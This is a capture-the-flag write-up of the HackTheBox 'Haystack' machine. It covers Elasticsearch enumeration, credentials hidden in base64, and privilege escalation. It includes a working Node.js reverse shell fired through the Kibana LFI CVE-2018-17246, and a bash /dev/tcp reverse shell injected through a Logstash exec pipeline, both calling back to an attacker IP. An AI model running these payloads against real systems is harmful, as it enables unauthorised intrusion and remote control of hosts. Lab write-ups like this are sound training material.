HacktheBox — Haystack

sif0
Nov 2 · 12 min read
hackthebox.eu

This is a write-up on how I solved Haystack from HacktheBox.

Hack the Box is an online platform where you practice your penetration testing skills.

As always, I try to explain how I understood the concepts from this machine, because I really want to understand how things work. If I misunderstood a concept, please let me know.

About the box:

This box got a lot of hate because of its initial step. It starts with a base64 string inside a picture, where you’ll look for it in a “haystack” of data. After that, you’ll get credentials to SSH in the box. Then you have to exploit an LFI vulnerability in Kibana, then create a file that will be ingested by Logstash, leading to code execution as root.

Recon:

I first run an initial nmap scan, saving the output to my nmap directory:

nmap -sV -sC -oA nmap/initial 10.10.10.115

The results are:

Nmap scan report for 10.10.10.115
Host is up (0.72s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 2a:8d:e2:92:8b:14:b6:3f:e4:2f:3a:47:43:23:8b:2b (RSA)
|   256 e7:5a:3a:97:8e:8e:72:87:69:a3:0d:d1:00:bc:1f:09 (ECDSA)
|_  256 01:d2:59:b2:66:0a:97:49:20:5f:1c:84:eb:81:ed:95 (ED25519)
80/tcp   open  http    nginx 1.12.2
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (text/html).
9200/tcp open  http    nginx 1.12.2
| http-methods:
|_  Potentially risky methods: DELETE
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (application/json; charset=UTF-8).

Note that port 22 (SSH), port 80 (HTTP via nginx), and port 9200 are open based on my initial scan. The nginx version running on port 80 and port 9200 is the same.

Port 80

Checking port 80, all I get is this:

It is an image of a needle in a haystack. I then check the page source:

So the page only has the image. I download it and inspect it using exiftool:

I also run strings on the file and find a base64-encoded string at the end:
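The strings output itself is a screenshot; the step can be reproduced locally with a stand-in file (needle.jpg and its leading bytes here are placeholders, not the real image):

```shell
# Build a stand-in "image": a few non-printable bytes followed by the base64 string
printf '\377\330\377\340JFIFdata\nbGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==\n' > needle.jpg
# strings pulls out printable runs; the base64 blob is the last one
strings needle.jpg | tail -n 1
```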

I decode it by invoking:

echo -n bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==|base64 -d

The output is:

la aguja en el pajar es "clave"

Since it looks like Spanish, I quickly throw it over to Google Translate:

The translation is "the needle in the haystack is 'key'". Note that the word for key, "clave", is placed between quotes.

Port 9200

Checking port 9200:

It's Elasticsearch. Reading through its documentation, I find that by default it listens on port 9200 (for REST). It can also listen on port 9300 for node communication. According to the documentation:

The Elasticsearch REST APIs are exposed using JSON over HTTP.

Listing indices:

I first start to list the indices:

curl http://10.10.10.115:9200/_cat/indices?v

This returns high-level information about the indices in a cluster.

There are 3 indices: .kibana (the default), quotes, and bank.

I can then run a search on an index with the format:

curl -X POST http://10.10.10.115:9200/<index>/_search

I then check it on the bank index:

curl -X POST http://10.10.10.115:9200/bank/_search

This returns tons of JSON data:

"took":2,"timed_out":false,"_shards":{"total":5,"successful":5,"skipped":0,"failed":0},"hits":{"total":1000,"max_score":1.0,"hits":[{"_index":"bank","_type":"account","_id":"25","_score":1.0,"_source":{"account_number":25,"balance":40540,"firstname":"Virginia","lastname":"Ayala","age":39,"gender":"F","address":"171 Putnam Avenue","employer":"Filodyne","email":"virginiaayala@filodyne.com","city":"Nicholson","state":"PA"}},{"_index":"bank","_type":"account","_id":"44","_score":1.0,"_source":{"account_number":44,"balance":34487,"firstname":"Aurelia","lastname":"Harding","age":37,"gender":"M","address":"502 Baycliff Terrace","employer":"Orbalix","email":"aureliaharding@orbalix.com","city":"Yardville","state":"DE"}},{"_index":"bank","_type":"account","_id":"99","_score":1.0,"_source":{"account_number":99,"balance":47159,"firstname":"Ratliff","lastname":"Heath","age":39,"gender":"F","address":"806 Rockwell Place","employer":"Zappix","email":"ratliffheath@zappix.com","city":"Shaft","state":"ND"}},{"_index":"bank","_type":"account","_id":"119","_score":1.0,"_source":{"account_number":119,"balance":49222,"firstname":"Laverne","lastname":"Johnson","age":28,"gender":"F","address":"302 Howard Place","employer":"Senmei","email":"lavernejohnson@senmei.com","city":"Herlong","state":"DC"}},{"_index":"bank","_type":"account","_id":"126","_score":1.0,"_source":{"account_number":126,"balance":3607,"firstname":"Effie","lastname":"Gates","age":39,"gender":"F","address":"620 National Drive","employer":"Digitalus","email":"effiegates@digitalus.com","city":"Blodgett","state":"MD"}},{"_index":"bank","_type":"account","_id":"145","_score":1.0,"_source":{"account_number":145,"balance":47406,"firstname":"Rowena","lastname":"Wilkinson","age":32,"gender":"M","address":"891 Elton 
Street","employer":"Asimiline","email":"rowenawilkinson@asimiline.com","city":"Ripley","state":"NH"}},{"_index":"bank","_type":"account","_id":"183","_score":1.0,"_source":{"account_number":183,"balance":14223,"firstname":"Hudson","lastname":"English","age":26,"gender":"F","address":"823 Herkimer Place","employer":"Xinware","email":"hudsonenglish@xinware.com","city":"Robbins","state":"ND"}},{"_index":"bank","_type":"account","_id":"190","_score":1.0,"_source":{"account_number":190,"balance":3150,"firstname":"Blake","lastname":"Davidson","age":30,"gender":"F","address":"636 Diamond Street","employer":"Quantasis","email":"blakedavidson@quantasis.com","city":"Crumpler","state":"KY"}},{"_index":"bank","_type":"account","_id":"208","_score":1.0,"_source":{"account_number":208,"balance":40760,"firstname":"Garcia","lastname":"Hess","age":26,"gender":"F","address":"810 Nostrand Avenue","employer":"Quiltigen","email":"garciahess@quiltigen.com","city":"Brooktrails","state":"GA"}},{"_index":"bank","_type":"account","_id":"222","_score":1.0,"_source":{"account_number":222,"balance":14764,"firstname":"Rachelle","lastname":"Rice","age":36,"gender":"M","address":"333 Narrows Avenue","employer":"Enaut","email":"rachellerice@enaut.com","city":"Wright","state":"AZ"}}]}}

I can then pipe it to jq and filter the first 30 results:

curl -X POST http://10.10.10.115:9200/bank/_search | jq . | head -n 30

The output is:

Since it's JSON, the data is name/value pairs. I can then filter using a jq query. I'll try to list all values with the name balance. To do it:

curl -X POST http://10.10.10.115:9200/bank/_search | jq -r '.hits | .hits | .[] | ._source | .balance'

The command above runs _search on the index bank, then pipes it to a jq query that looks for the value inside the name hits, then the value inside hits again (which is an array, hence .[]), then the value inside _source, and finally the balance field. I did this to practice jq 😂

I get this output:

40540
34487
47159
49222
3607
47406
14223
3150
40760
14764
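For comparison, the same nested lookup can be written as a single compact jq path. Here it is checked against a small inline sample shaped like the bank response (the sample balances are taken from the output above):

```shell
# Compact jq path equivalent to '.hits | .hits | .[] | ._source | .balance',
# run against an inline sample with the same shape as the bank index response
echo '{"hits":{"hits":[{"_source":{"balance":40540}},{"_source":{"balance":34487}}]}}' \
  | jq -r '.hits.hits[]._source.balance'
```

Against the box, the same path works: curl -s -X POST http://10.10.10.115:9200/bank/_search | jq -r '.hits.hits[]._source.balance'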

Since there is nothing interesting in the index bank, I move on to quotes.

Quotes

Checking for the first 20 lines:

curl -X POST http://10.10.10.115:9200/quotes/_search | jq . | head -n 20

The output is:

{
  "took": 1,
  "timed_out": false,
  "_shards": {
    "total": 5,
    "successful": 5,
    "skipped": 0,
    "failed": 0
  },
  "hits": {
    "total": 253,
    "max_score": 1,
    "hits": [
      {
        "_index": "quotes",
        "_type": "quote",
        "_id": "14",
        "_score": 1,
        "_source": {
          "quote": "En América se desarrollaron importantes civilizaciones, como Caral

Since the structure is hits → hits → _source → quote, I can invoke the command below to get the quote field, take the first 20 lines, and pipe it to jq again (since piping the output of jq through another command loses its formatting):

curl -X POST http://10.10.10.115:9200/quotes/_search | jq -r '.hits | .hits |.[] | ._source ' | head -n 20 | jq .

The output is:

{
"quote": "En América se desarrollaron importantes civilizaciones, como Caral (la civilización más antigua de América, la cual se desarrolló en la zona central de Perú), los anasazi, los indios pueblo, quimbaya, nazca, chimú, chavín, paracas, moche, huari, lima, zapoteca, mixteca, totonaca, tolteca, olmeca y chibcha, y las avanzadas civilizaciones correspondientes a los imperios de Teotihuacan, Tiahuanaco, maya, azteca e inca, entre muchos otros."
}
{
"quote": "Imperios español y portugués en 1790."
}
{
"quote": "También se instalaron en América del Sur repúblicas de pueblos de origen africano que lograron huir de la esclavitud a la que habían sido reducidos por los portugueses, como el Quilombo de los Palmares o el Quilombo de Macaco."
}
{
"quote": "En 1804, los esclavos de origen africano de Haití se sublevaron contra los colonos franceses, declarando la independencia de este país y creando el primer estado moderno con gobernantes afroamericanos."
}
{
"quote": "A partir de 1809,23​ los pueblos bajo dominio de España llevaron adelante una Guerra de Independencia Hispanoamericana, de alcance continental, que llevó, luego de complejos procesos, al surgimiento de varias naciones: Argentina, Bolivia, Colombia, Costa Rica, Panamá, Chile, Ecuador, El Salvador, Guatemala, Honduras, México, Nicaragua, Paraguay, Perú, Uruguay y Venezuela. En 1844 y 1898 el proceso se completaría con la independencia de República Dominicana y Cuba, respectivamente."
}
{
"quote": "En 1816, se conformó un enorme estado independiente sudamericano, denominado Gran Colombia, y que abarcó los territorios de los actuales Panamá, Colombia, Venezuela y Ecuador y zonas de Brasil, Costa Rica, Guyana, Honduras, Nicaragua y Perú. La República se disolvió en 1830."
}

I get a bunch of quotes. If I translate one of the shorter quotes:

Nothing useful. They are just a bunch of sentences. I then try to grep the output for "clave" (a pure guess, since the hint is in Spanish), but get nothing. In hindsight this makes sense: _search returns only the first 10 hits by default, so I am barely scratching the surface of the index.

Since I may not be getting all the data, I look for a tool that can dump everything from an index so I can filter locally. I come across elasticsearch-dump.

I can then dump the data from each index. Since the decoded base64 hints at Spanish, I'll dump the quotes index first, since its contents are also in Spanish.

Mapping the data:

elasticsearch-dump/bin/elasticdump --input=http://10.10.10.115:9200/quotes --output=writeup/quote.mapping.json --type=mapping

Dumping the data:

elasticsearch-dump/bin/elasticdump --input=http://10.10.10.115:9200/quotes --output=writeup/quote.data.json --type=data

From what I did earlier, I can then check for the top 20 lines when searching for the quote value:

cat quote.data.json | jq -r '._source' | head -n 20 | jq .

The output is:

{
"quote": "En América se desarrollaron importantes civilizaciones, como Caral (la civilización más antigua de América, la cual se desarrolló en la zona central de Perú), los anasazi, los indios pueblo, quimbaya, nazca, chimú, chavín, paracas, moche, huari, lima, zapoteca, mixteca, totonaca, tolteca, olmeca y chibcha, y las avanzadas civilizaciones correspondientes a los imperios de Teotihuacan, Tiahuanaco, maya, azteca e inca, entre muchos otros."
}
{
"quote": "Imperios español y portugués en 1790."
}
{
"quote": "También se instalaron en América del Sur repúblicas de pueblos de origen africano que lograron huir de la esclavitud a la que habían sido reducidos por los portugueses, como el Quilombo de los Palmares o el Quilombo de Macaco."
}
{
"quote": "En 1804, los esclavos de origen africano de Haití se sublevaron contra los colonos franceses, declarando la independencia de este país y creando el primer estado moderno con gobernantes afroamericanos."
}

The output looks similar to before, but when I use tail to check the last quote values:

cat quote.data.json | jq -r '._source' | tail -n 20

The output is different from earlier:

{
"quote": "A pesar de ser considerada como una ciudad «relativamente segura», el nivel de temor en la población ha crecido de manera importante en el último tiempo. En 2007, un 22 % de su población manifestaba un «alto temor» de sufrir algún tipo de crimen en su contra, mientras en años anteriores las cifras eran considerablemente menores (en 2000 era de un 13,4 % y en 2005 de un 15,8 %). En comparación con otras ciudades del país, el promedio de este índice fuera de la capital es de un 15,9 % e incluso esta cifra es mayor que en las ciudades con mayor tasa de victimización: Iquique y Talca que poseen un 37,5 % y 35,9 % de victimización, sólo un 17,7 % y un 18,9 % de la población respectiva manifiesta un «alto temor». En el desglose por comunas, nuevamente las cifras más bajas están en el sector oriente, con Ñuñoa con un 10 %, y las más altas en El Bosque, con un 32,5 %.100​ Este alto grado de inseguridad que siente la población ha sido descrito como producto de las enormes brechas que diferencian a los habitantes de la ciudad y el rol de los medios de comunicación, entre otros.102"
}

Since this dump contains data I was not able to query earlier, I grep for the string "clave" again, this time against the whole dump:

cat quote.data.json | grep clave

The output is:

{"_index":"quotes","_type":"quote","_id":"111","_score":1,"_source":{"quote":"Esta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk="}}
{"_index":"quotes","_type":"quote","_id":"45","_score":1,"_source":{"quote":"Tengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg "}}

They look like base64. Decoding them leads to:

echo -n cGFzczogc3BhbmlzaC5pcy5rZXk= | base64 -d
pass: spanish.is.key
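The second string decodes the same way; note the trailing space, which is part of the encoded data:

```shell
# Decode the user half of the credentials found in the quotes index
echo -n 'dXNlcjogc2VjdXJpdHkg' | base64 -d   # prints: user: security (with a trailing space)
```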

Using the credentials (security : spanish.is.key) to SSH in works:

root@kali:~/Documents/htb/boxes/haystack# ssh security@10.10.10.115
security@10.10.10.115's password:

I can now read user.txt:

[security@haystack ~]$ cat user.txt
04d18bc79....

Getting Root:

The root part of this box is cool; it made me understand a technology I wasn't familiar with. I start my enumeration by checking /etc/passwd for other potential users I can escalate to:

[security@haystack etc]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
security:x:1000:1000:security:/home/security:/bin/bash
elasticsearch:x:997:995:elasticsearch user:/nonexistent:/sbin/nologin
logstash:x:996:994:logstash:/usr/share/logstash:/sbin/nologin
nginx:x:995:993:Nginx web server:/var/lib/nginx:/sbin/nologin
kibana:x:994:992:kibana service user:/home/kibana:/sbin/nologin

Seeing that there are kibana and logstash users, I run ps aux to check if those services are running:

kibana     6307  0.5  5.4 1351328 210872 ?      Ssl  Nov01   1:07 /usr/share/kibana/bin/../node/bin/node --no-warnings /usr/share/kibana/bin/../src/cli -c /etc/kibana/kibana.yml

It stands out that there is a Kibana service running. Kibana is a data visualization plugin for Elasticsearch.

Reading the Kibana documentation, the config file is stored by default at /etc/kibana/kibana.yml. Reading its contents:

[security@haystack kibana]$ cat kibana.yml                                                                                                                                               
# Kibana is served by a back end server. This setting specifies the port to use.
server.port: 5601

# Specifies the address to which the Kibana server will bind. IP addresses and host names are both valid values.
# The default is 'localhost', which usually means remote machines will not be able to connect.
# To allow connections from remote users, set this parameter to a non-loopback address.
server.host: "127.0.0.1"

Running curl against localhost on port 5601 to see if it's running:

[security@haystack kibana]$ curl 127.0.0.1:5601
<script>var hashRoute = '/app/kibana';
var defaultRoute = '/app/kibana';

Checking port 9200 again shows the version of Elasticsearch:

"version" : {
"number" : "6.4.2"

I then check for vulnerabilities for version 6.4.2, and a Kibana vulnerability stands out:

You can read about the vulnerability here:

The post explores a critical-severity Local File Inclusion (LFI) vulnerability in Kibana, uncovered by CyberArk Labs. There is a post on GitHub that summarizes it: https://github.com/mpgn/CVE-2018-17246

CVE-2018-17246

I create a file at /tmp/shell.js with the contents:

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(1339, "10.10.14.33", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();

Triggering the LFI:

curl 127.0.0.1:5601/api/console/api_server?apis=../../../../../../../tmp/shell.js

With a listener waiting on port 1339, I get a shell as the kibana user:

Checking for files owned by the group kibana, excluding files under /proc:

find / -group kibana 2>/dev/null | grep -v proc

The logstash folder stands out:

Checking files under conf.d:

I see that the files are in the group kibana but owned by the user root. I then read the contents of the configuration files:

input.conf

filter.conf

output.conf

So basically, input.conf reads files under /opt/kibana/ whose names match logstash_*, checking every 10 seconds and setting the type to execute.

The filter.conf then takes events whose type is set to "execute" and matches the message inside the file against:

"Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}"

You can read more about grok filtering here: https://www.elastic.co/guide/en/logstash/current/plugins-filters-grok.html

The output config file then takes the event and executes a shell command through the exec output plugin. From the documentation itself: "The command field of this event will be the command run." This means I can execute code.
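The screenshots of the three files are not reproduced here; based on the behavior just described, they look roughly like the sketch below (hedged: option names and exact values are reconstructed from the description, not copied from the box):

```
# input.conf -- read /opt/kibana/logstash_* every 10 seconds, tagging events as "execute"
input {
  file {
    path => "/opt/kibana/logstash_*"
    start_position => "beginning"
    stat_interval => "10 second"
    type => "execute"
  }
}

# filter.conf -- extract the command from messages matching the grok pattern
filter {
  if [type] == "execute" {
    grok {
      match => { "message" => "Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}" }
    }
  }
}

# output.conf -- run the captured command via the exec output plugin
output {
  if [type] == "execute" {
    exec {
      command => "%{comando} &"
    }
  }
}
```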

So our file should be:

Ejecutar comando : <command here>

I then create a file called logstash_a containing a command that connects back to me:
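A sketch of that step (assumptions: attacker IP 10.10.14.33 and listener port 1339, reused from the Kibana shell; on the box the file has to land in /opt/kibana/, while here it is created in the current directory so the format can be checked):

```shell
# Build a line matching the grok pattern "Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}".
# The captured command is a bash reverse shell (assumed listener: 10.10.14.33:1339).
payload='Ejecutar comando : bash -i >& /dev/tcp/10.10.14.33/1339 0>&1'
printf '%s\n' "$payload" > logstash_a   # on the box: write to /opt/kibana/logstash_a
# Sanity-check the format against an ERE approximation of the grok pattern
grep -E 'Ejecutar[[:space:]]*comando[[:space:]]*:[[:space:]]+.+' logstash_a
```

Within 10 seconds of the file landing in /opt/kibana/, Logstash (running as root) ingests it and runs the command.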

And from my listener, I get the shell as root:

I can now read root.txt:

So that’s how I solved Haystack from Hack the Box.

I hope you learned something from this. Thanks for reading my write-up! Cheers! 🍺

